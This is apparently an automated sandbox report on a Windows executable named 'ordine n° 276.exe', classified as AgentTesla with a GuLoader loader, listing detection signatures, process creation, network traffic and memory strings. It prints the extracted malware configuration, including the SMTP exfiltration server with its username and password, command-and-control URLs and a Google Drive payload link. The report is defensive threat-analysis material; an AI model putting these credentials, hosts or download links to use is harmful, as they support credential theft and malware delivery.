Play interactive tour

Edit tour

Analysis Report ordine n#U00b0 276.exe

Overview

General Information

Sample Name:	ordine n#U00b0 276.exe
Analysis ID:	404980
MD5:	10f03c95ba280cd5a82146269f89ca9d
SHA1:	c24232721d7aefe2c013b9642e0ab7db8007e48a
SHA256:	11f63d2fda1055ac66a71cb539c9d5ff66fd79f473e19171fd8f663e2c4979b9
Infos:
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: RegAsm connects to smtp port

Yara detected AgentTesla

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Hides threads from debuggers

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

ordine n#U00b0 276.exe (PID: 6992 cmdline: 'C:\Users\user\Desktop\ordine n#U00b0 276.exe' MD5: 10F03C95BA280CD5A82146269F89CA9D)

RegAsm.exe (PID: 2588 cmdline: 'C:\Users\user\Desktop\ordine n#U00b0 276.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

RegAsm.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\ordine n#U00b0 276.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

RegAsm.exe (PID: 6412 cmdline: 'C:\Users\user\Desktop\ordine n#U00b0 276.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "M54FGDMtaO", "URL: ": "http://5Z6zzpV4pHjt.com", "To: ": "", "ByHost: ": "smtp.fil-net.com:587", "Password: ": "OLotoUPgHE9Y", "From: ": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.638126535.000000000040C000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1298:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1298:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6412	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6412	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 2 entries

Sigma Overview

Networking:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 46.16.61.250, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 6412, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49777

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RegAsm.exe.6412.7.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "M54FGDMtaO", "URL: ": "http://5Z6zzpV4pHjt.com", "To: ": "", "ByHost: ": "smtp.fil-net.com:587", "Password: ": "OLotoUPgHE9Y", "From: ": ""}

Multi AV Scanner detection for submitted file

Show sources

Source: ordine n#U00b0 276.exe	Virustotal: Detection: 26%			Perma Link
Source: ordine n#U00b0 276.exe	ReversingLabs: Detection: 35%

Source: ordine n#U00b0 276.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.4:49766 version: TLS 1.2

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000007.00000002.1037344500.0000000020710000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://5Z6zzpV4pHjt.com

Source: global traffic

TCP traffic: 192.168.2.4:49777 -> 46.16.61.250:587

Source: Joe Sandbox View

IP Address: 46.16.61.250 46.16.61.250

Source: Joe Sandbox View

ASN Name: CDMONsistemescdmoncomES CDMONsistemescdmoncomES

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

TCP traffic: 192.168.2.4:49777 -> 46.16.61.250:587

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 7_2_1D7DA09A recv,

7_2_1D7DA09A

Source: unknown

DNS traffic detected: queries for: doc-10-9k-docs.googleusercontent.com

Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: http://5Z6zzpV4pHjt.com
Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: RegAsm.exe, 00000007.00000003.976218379.0000000001036000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: RegAsm.exe, 00000007.00000002.1031709055.0000000000FEF000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0
Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: http://mGfDbY.com
Source: RegAsm.exe, 00000007.00000003.976218379.0000000001036000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: RegAsm.exe, 00000007.00000002.1031709055.0000000000FEF000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: RegAsm.exe, 00000007.00000003.976218379.0000000001036000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0%
Source: RegAsm.exe, 00000007.00000002.1035500549.000000001DBB8000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000007.00000003.976293343.0000000001005000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-9k-docs.googleusercontent.com/
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-9k-docs.googleusercontent.com/G
Source: RegAsm.exe, 00000007.00000002.1031722866.000000000100D000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-9k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/uf4tta3o
Source: RegAsm.exe, 00000007.00000002.1031669686.0000000000FA8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000007.00000002.1031669686.0000000000FA8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1eL1W59FTaS1ZK7NLLis7VKY3s5Fdhau-
Source: RegAsm.exe, 00000007.00000002.1031747956.000000000103D000.00000004.00000001.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: RegAsm.exe, 00000007.00000002.1035317634.000000001DA61000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443

Source: unknown

HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.4:49766 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000000.638126535.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02172819 NtAllocateVirtualMemory,	0_2_02172819
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D7DB0BA NtQuerySystemInformation,	7_2_1D7DB0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D7DB089 NtQuerySystemInformation,	7_2_1D7DB089

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040377D	0_2_0040377D
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404647	0_2_00404647
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404263	0_2_00404263
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404463	0_2_00404463
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404A2C	0_2_00404A2C
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040483D	0_2_0040483D
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004038C1	0_2_004038C1
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040408E	0_2_0040408E
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403E98	0_2_00403E98
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403CB3	0_2_00403CB3
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404746	0_2_00404746
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404551	0_2_00404551
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00404365	0_2_00404365
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040493B	0_2_0040493B
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004039C7	0_2_004039C7
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_004037CB	0_2_004037CB
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403F94	0_2_00403F94
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00403D9F	0_2_00403D9F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_01124850	7_2_01124850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_0112C4F8	7_2_0112C4F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_0112ABEC	7_2_0112ABEC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_01126A08	7_2_01126A08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_01126270	7_2_01126270
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_0112D038	7_2_0112D038
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D390F38	7_2_1D390F38
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D395F08	7_2_1D395F08
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D392C00	7_2_1D392C00
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D390070	7_2_1D390070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D393580	7_2_1D393580
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D397DC1	7_2_1D397DC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D390007	7_2_1D390007
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1FBBE8A2	7_2_1FBBE8A2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1FBB8EF0	7_2_1FBB8EF0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1FBB7C48	7_2_1FBB7C48

Source: ordine n#U00b0 276.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: ordine n#U00b0 276.exe, 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameOPARBE.exe vs ordine n#U00b0 276.exe
Source: ordine n#U00b0 276.exe	Binary or memory string: OriginalFilenameOPARBE.exe vs ordine n#U00b0 276.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: security.dll			Jump to behavior

Source: ordine n#U00b0 276.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000000.638126535.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@8/2@3/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D7DAF3E AdjustTokenPrivileges,		7_2_1D7DAF3E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_1D7DAF07 AdjustTokenPrivileges,		7_2_1D7DAF07

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\1sxxov2t.dy0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

File created: C:\Users\user\AppData\Local\Temp\~DF49B334E29C6CF724.TMP

Jump to behavior

Source: ordine n#U00b0 276.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: ordine n#U00b0 276.exe	Virustotal: Detection: 26%
Source: ordine n#U00b0 276.exe	ReversingLabs: Detection: 35%

Source: unknown	Process created: C:\Users\user\Desktop\ordine n#U00b0 276.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\ordine n#U00b0 276.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: RegAsm.exe, 00000007.00000002.1037344500.0000000020710000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 6412, type: MEMORY

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407CDB push es; iretd	0_2_00407CDC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040CEF8 push ebp; iretd	0_2_0040CEFE
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0040855C push esp; iretd	0_2_00408564
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00408565 push esp; iretd	0_2_00408564
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00408565 push esp; iretd	0_2_00408598
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407D6F push edx; iretd	0_2_00407D7C
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407B2B push ds; retf	0_2_00407B68
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407FCC push esp; iretd	0_2_00407FD0
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00405BD3 push DD90C9D6h; retf	0_2_00405CCC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00408DD4 push esi; retf	0_2_00408DD5
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00405BE4 push DD90C9D6h; retf	0_2_00405CCC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00407F8D push esp; iretd	0_2_00407FB8
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_00405D90 push esp; iretd	0_2_00405DA8
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_021712B8 push ebp; ret	0_2_02171350
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0217131E push ebp; ret	0_2_02171350
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0217230E push edx; ret	0_2_02172310
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02170056 push ebp; ret	0_2_02170057
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02173043 push 74E8A32Bh; ret	0_2_02173048
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_02173093 push 18ECA32Bh; ret	0_2_02173098
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_021717CB push edx; ret	0_2_021717DC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_021724A9 push ebx; ret	0_2_021724AC
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_0217085E push 0000002Bh; retf	0_2_021708BD
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Code function: 0_2_021708C8 push 0000002Bh; retf	0_2_021708BD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_01125B00 push 0000001Ch; mov dword ptr [esp], eax	7_2_01125B1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 7_2_201E406C push ss; iretd	7_2_201E406E

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
